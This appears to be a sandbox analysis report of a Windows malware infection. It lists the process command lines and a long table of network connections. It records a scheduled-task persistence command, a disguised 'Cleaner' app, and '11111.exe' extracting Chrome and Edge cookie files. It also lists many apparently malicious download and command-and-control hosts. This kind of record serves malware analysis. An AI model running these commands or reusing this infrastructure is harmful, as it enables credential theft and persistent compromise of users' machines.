C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\timeout.exe
timeout 4
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\schtasks.exe
schtasks.exe /create /f /sc MINUTE /mo 1 /tn "MicrosoftApi" /tr "'C:\Users\Admin\AppData\Roaming\ServiceMicrosoftApi\MicrosoftApi.exe"'
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_30CD.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7fffc5b3dec0,0x7fffc5b3ded0,0x7fffc5b3dee0
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff7a12f9e70,0x7ff7a12f9e80,0x7ff7a12f9e90
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1580,4355612113474053710,3623371219295520563,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5228_626154439" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1592 /prefetch:2
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1580,4355612113474053710,3623371219295520563,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5228_626154439" --mojo-platform-channel-handle=1904 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1580,4355612113474053710,3623371219295520563,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5228_626154439" --mojo-platform-channel-handle=2336 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1580,4355612113474053710,3623371219295520563,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5228_626154439" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2420 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1580,4355612113474053710,3623371219295520563,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5228_626154439" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2412 /prefetch:1
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,4355612113474053710,3623371219295520563,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5228_626154439" --mojo-platform-channel-handle=3204 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1580,4355612113474053710,3623371219295520563,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5228_626154439" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3252 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,4355612113474053710,3623371219295520563,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5228_626154439" --mojo-platform-channel-handle=3540 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| N/A | 95.101.206.92:80 | go.microsoft.com | tcp |
| N/A | 8.8.8.8:53 | dmd.metaservices.microsoft.com | udp |
| N/A | 20.189.118.208:80 | dmd.metaservices.microsoft.com | tcp |
| N/A | 20.54.89.106:443 | slscr.update.microsoft.com | tcp |
| N/A | 37.0.8.235:80 | tcp | |
| N/A | 40.125.122.151:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 20.54.89.106:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.54.89.106:443 | slscr.update.microsoft.com | tcp |
| N/A | 37.0.11.8:80 | tcp | |
| N/A | 20.54.89.106:443 | slscr.update.microsoft.com | tcp |
| N/A | 172.67.133.215:80 | wfsdragon.ru | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 20.54.89.106:443 | slscr.update.microsoft.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | udp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | hockeybruinsteamshop.com | udp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | fsstoragecloudservice.com | udp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 8.8.8.8:53 | i.spesgrt.com | udp |
| N/A | 52.219.158.50:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 172.67.153.179:80 | i.spesgrt.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 185.183.96.3:80 | privacytoolz123foryou.xyz | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 104.21.49.131:443 | a.goatagame.com | tcp |
| N/A | 88.99.66.31:80 | iplis.ru | tcp |
| N/A | 88.99.66.31:80 | iplis.ru | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 111.90.156.58:443 | fsstoragecloudservice.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 172.67.161.96:443 | bb.goatggame.com | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 185.233.185.134:80 | alebastersbastard.com | tcp |
| N/A | 192.210.222.84:80 | 192.210.222.84 | tcp |
| N/A | 52.219.158.50:443 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 104.21.86.82:80 | swretjhwrtj.gq | tcp |
| N/A | 195.2.78.163:25450 | tcp | |
| N/A | 104.21.1.69:443 | one-wedding-film.xyz | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 104.21.17.130:443 | s.lletlee.com | tcp |
| N/A | 31.31.198.230:80 | u1452023.cp.regruhosting.ru | tcp |
| N/A | 186.2.171.3:80 | 186.2.171.3 | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 179.60.192.36:443 | www.facebook.com | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 45.14.49.128:5385 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 95.181.172.100:55640 | tcp | |
| N/A | 135.148.139.222:1494 | tcp | |
| N/A | 104.26.8.187:80 | proxycheck.io | tcp |
| N/A | 104.21.1.123:443 | money4systems4.xyz | tcp |
| N/A | 52.219.62.34:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 52.219.62.34:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 77.83.175.169:11490 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.205.30:443 | download-serv-234116.xyz | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 77.83.175.169:11490 | tcp | |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 95.213.224.6:80 | readinglistforaugust2.xyz | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 144.202.76.47:443 | www.listincode.com | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 66.29.130.154:80 | perfect-request-smart.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 45.136.151.102:80 | staticimg.youtuuee.com | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 104.26.3.60:443 | ipqualityscore.com | tcp |
| N/A | 45.136.151.102:80 | staticimg.youtuuee.com | tcp |
| N/A | 104.26.3.60:443 | ipqualityscore.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 104.21.1.69:443 | one-wedding-film.xyz | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 104.26.3.60:443 | ipqualityscore.com | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 72.21.91.29:80 | statuse.digitalcertvalidation.com | tcp |
| N/A | 5.182.39.145:80 | ingstorage.com | tcp |
| N/A | 5.182.39.145:80 | ingstorage.com | tcp |
| N/A | 52.222.137.218:80 | duzlwewk2uk96.cloudfront.net | tcp |
| N/A | 188.40.106.215:80 | s3.tebi.io | tcp |
| N/A | 52.222.137.218:80 | duzlwewk2uk96.cloudfront.net | tcp |
| N/A | 188.40.106.215:80 | s3.tebi.io | tcp |
| N/A | 95.142.37.102:80 | activityhike.com | tcp |
| N/A | 95.142.37.102:443 | activityhike.com | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 172.67.153.179:80 | i.spesgrt.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 185.183.96.3:80 | privacytoolz123foryou.xyz | tcp |
| N/A | 88.99.66.31:80 | iplis.ru | tcp |
| N/A | 52.219.64.63:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 88.99.66.31:80 | iplis.ru | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 104.21.49.131:443 | a.goatagame.com | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 111.90.156.58:443 | fsstoragecloudservice.com | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 172.67.161.96:443 | bb.goatggame.com | tcp |
| N/A | 185.233.185.134:80 | alebastersbastard.com | tcp |
| N/A | 192.210.222.84:80 | 192.210.222.84 | tcp |
| N/A | 52.219.64.63:443 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 172.67.178.16:443 | bestinternetstore.xyz | tcp |
| N/A | 8.8.8.8:53 | readinglistforaugust3.xyz | udp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 104.18.20.226:80 | crl.globalsign.com | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 104.26.8.187:80 | proxycheck.io | tcp |
| N/A | 104.21.86.82:80 | swretjhwrtj.gq | tcp |
| N/A | 8.8.8.8:53 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | udp |
| N/A | 52.219.62.3:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 52.219.62.3:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 195.2.78.163:25450 | tcp | |
| N/A | 104.21.1.69:443 | one-wedding-film.xyz | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 31.31.198.230:80 | u1452023.cp.regruhosting.ru | tcp |
| N/A | 172.67.205.30:443 | download-serv-234116.xyz | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 172.67.146.70:443 | a.goatgame.co | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 45.14.49.128:5385 | tcp | |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 135.148.139.222:1494 | tcp | |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 95.181.172.100:55640 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 104.21.1.123:443 | money4systems4.xyz | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 172.67.205.30:443 | download-serv-234116.xyz | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 77.83.175.169:11490 | tcp | |
| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 66.29.130.154:80 | perfect-request-smart.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 135.181.123.52:12073 | tcp | |
| N/A | 54.208.186.182:443 | paybiz.herokuapp.com | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 185.4.65.191:1203 | twelveoclock.top | tcp |
| N/A | 195.171.92.116:80 | geo.netsupportsoftware.com | tcp |
| N/A | 172.217.19.196:80 | www.google.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 45.129.236.6:63318 | tcp | |
| N/A | 8.8.8.8:53 | requestimmersive.com | udp |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 194.145.227.159:80 | 194.145.227.159 | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 23.217.250.58:80 | go.microsoft.com | tcp |
| N/A | 20.189.118.208:80 | dmd.metaservices.microsoft.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 8.8.8.8:53 | source3.boys4dayz.com | udp |
| N/A | 172.67.148.61:443 | source3.boys4dayz.com | tcp |
| N/A | 104.16.203.237:443 | www.mediafire.com | tcp |
| N/A | 199.91.155.72:443 | download2331.mediafire.com | tcp |
